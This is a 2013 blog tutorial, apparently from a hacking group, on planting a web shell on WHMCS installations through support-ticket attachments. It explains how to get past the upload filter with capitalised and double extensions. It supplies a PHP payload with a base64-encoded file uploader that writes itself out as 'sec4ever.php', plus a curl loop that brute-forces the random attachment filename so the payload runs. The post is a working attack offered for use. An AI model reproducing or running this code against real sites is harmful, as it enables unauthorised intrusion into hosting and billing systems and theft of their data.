Sunday, 14 April 2013

WHMCS Shell Uploading Tutorial





Credits: sec4ever, MadLeets and all Pakistani Haxors




 This Tutorial Is About Uploading Shell On WHMCS Via Attachments

At First , Let's Talk About Mime Types

These Are Extensions


Code:
gif,png,rar,zip,php,asp,aspx

Apache Uses Extension To Run File As It Extension

For Example If You Upload File As This : b0x.gif

Apache Will run it As Picture/Image

And If You Do it As This : b0x.php

The File will Be Run as PHP File Smile

Okay ... In Apache There Are Many Extensions Are Not Defined-ed Like rar

So Let's Start in WHMCS go to submit new ticket

Code:
http://site.tld/whmcs/submitticket.php

You'll See This

[Image: WOR61514.png]
So Here The Attachments We've Prospect'z

I : The Extension PHP Is allowed To Be Uploaded Smile

But When We Try 2 Upload PHP File We'll Have This result

[Image: AKQ64896.png]

To Bypass This Problem ,, Just You've To Change Extension From Small php To Capital PHP Like This

Code:
b0x.PHP

The Changing In Extension Will Be Via Tamepr Data

[Image: oDZ62191.png]

Then Submit it

[Image: wh162273.png]

Our Ticket Is ready Now .. So We Uploaded PHP

This Was Our 1st Prospect

II : PHP Extension Is not Allowed To Be uploaded on WHMCS

So We'll Use Non-Defined Extension in Apache

Like " rar " So We'll Use Tamper Data Too

[Image: tSi62460.png]

We'll Upload As This "b0x.PHP.rar"

Don't Forget Capital Letters

Then We'll Have This

[Image: hlj62514.png]

File Uploaded Successfully Big Grin

But In WHMCS ,, When You Use Attachment or upload One

The File Will Automatically Renamed To Be Like This

Code:
number_filename.extension

For Example Our File b0x.PHP Will Be Like This

Code:
RandomNumber_b0x.PHP

We'll Not be Able To Know The Numbers Because it Uses Random Number So We've To Try Numbers

Before That .. Let's Make Small Summery

This Code Must be As Attach File

PHP Code:
<?php
$shellcode 
"PD9waHANCmVjaG8gJzxiPjxicj48YnI+Jy5waHBfdW5hbWUoKS4nPGJyPjwvYj4nOw0KZWNobyAnPGZv ​ cm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFt ​ ZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1l ​ PSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwi ​ IHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkg ​ ew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWydu ​ YW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBTVUtTRVMgISEhPC9iPjxicj48YnI+JzsgfQ0KCWVsc2Ug ​eyBlY2hvICc8Yj5VcGxvYWQgR0FHQUwgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4="$b0x fopen("sec4ever.php","w"); fwrite($b0x,base64_decode($shellcode)); ?>

This is uploader Script Will be Opened In The Same Folde - attachments -
Now Upload it as Before Via .PHP or non-defined

After That ,, Use This Code To Generate / Browse Site And get Uploader in sec4ever.php

PHP Code:
<?
error_reporting
(0);  $url "http://domain.tld/whmcs/";  $attachfolder "attachments";  $attach"b0x.PHP";
for(
$b0x=100000$b0x<1000000;$b0x++){  $urls "$url/$attachfolder/$b0x"$urls.="_$attach";  $ch = @curl_init();
@
curl_setopt($chCURLOPT_RETURNTRANSFER1);
@
curl_setopt($chCURLOPT_URL$urls );  $result = @curl_exec($ch);
@
curl_close($ch);
}  
?>
 Edit The Variables To Get The Correct Result - 3xPecteD

Then When The Script Ends Browsing URL'z Via Auto-Generate By For Function

The Script Will Browse Your PHP Code But You'll No Be Able To Know What is the Number !

But The Script Will Generate Shell/Uploader in Sec4ever.php

[Image: q8O63187.png]


Credits: sec4ever, MadLeets and all Pakistani Haxors